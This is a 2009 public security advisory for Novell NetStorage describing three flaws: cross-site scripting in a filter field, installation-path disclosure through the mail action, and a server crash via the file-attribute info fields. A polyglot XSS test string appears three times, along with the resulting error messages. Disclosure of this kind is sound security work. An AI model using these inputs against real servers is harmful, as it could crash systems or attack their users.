Novell Netstorage XSS / Denial Of Service

`- Novell Netstorage Multiple Vulnerabilities  
  
- Description  
  
"Novell NetStorage acts as a bridge between a company's protected Novell network  
and the Internet, providing protected file access from any Internet  
location. Files  
and folders on a Novell NetWare® 6.5 server or Novell Open Enterprise  
Server can be  
accessed using either a browser or via Network Neighborhood and Microsoft Web  
Folders; no Novell Client^Ù software is required. Users can securely  
access files  
from any IP-enabled machine via Secure Sockets Layer (SSL) and Secure Hypertext  
Transfer Protocol (HTTPS)."  
  
Novell NetStorage contains a wide variety of vulnerabilities that may  
allow an attacker  
to cause a denial of service, gain configuration information or exploit other  
users of the application.  
  
#1 - Filter Field XSS  
  
The 'filter' field does not sanitize user-supplied input. An attacker  
could use this  
to carry out cross-site scripting attacks against other authenticated users.  
  
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->  
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>  
  
#2 - Mail File Action Path Disclosure  
  
On a file list, if a user right clicks a file, chooses the 'mail'  
option and then  
pastes script code in any field, the application will produce an error message  
disclosing the installation path:  
  
Paste the following script:  
  
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><  
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>  
  
Resulting error:  
  
OES:  
'file:/var/opt/novell/novlwww/email.xsl': (1): mismatched end tag:  
expected "to" but got "SCRIPT"  
  
Netware:  
'file:/SYS:/tomcat/4/email.xsl': (1): mismatched end tag: expected  
"subject" but got "SCRIPT"  
  
#3 - File Attribute Malformed Input Server DoS  
  
When interacting with files, a user can right click on the file and click  
either 'NFS Info' or 'Netware Info'. Supplying script code into various fields  
will cause the Netware server to abend and lock up.  
  
Note: This was only tested on version 2.0.1 on netware 6.5 SP6, not OES.  
  
The following script code causes the issue:  
  
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><  
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>  
  
- Product  
  
Novell Inc., Netstorage, 3.1.5-19 on OES - 2.0.1 on netware 6.5 SP6  
  
- Solution  
  
None  
  
- Timeline  
  
2008-06-06: Vulnerability Discovered  
2008-07-07: Disclosed to Vendor (no ack)  
2008-10-05: Re-sent to Vendor (no ack)  
2009-03-26: Disclosed to Public (no more playing nice)  
  
--   
  
BugsNotHugs  
Shared Vulnerability Disclosure Account  
`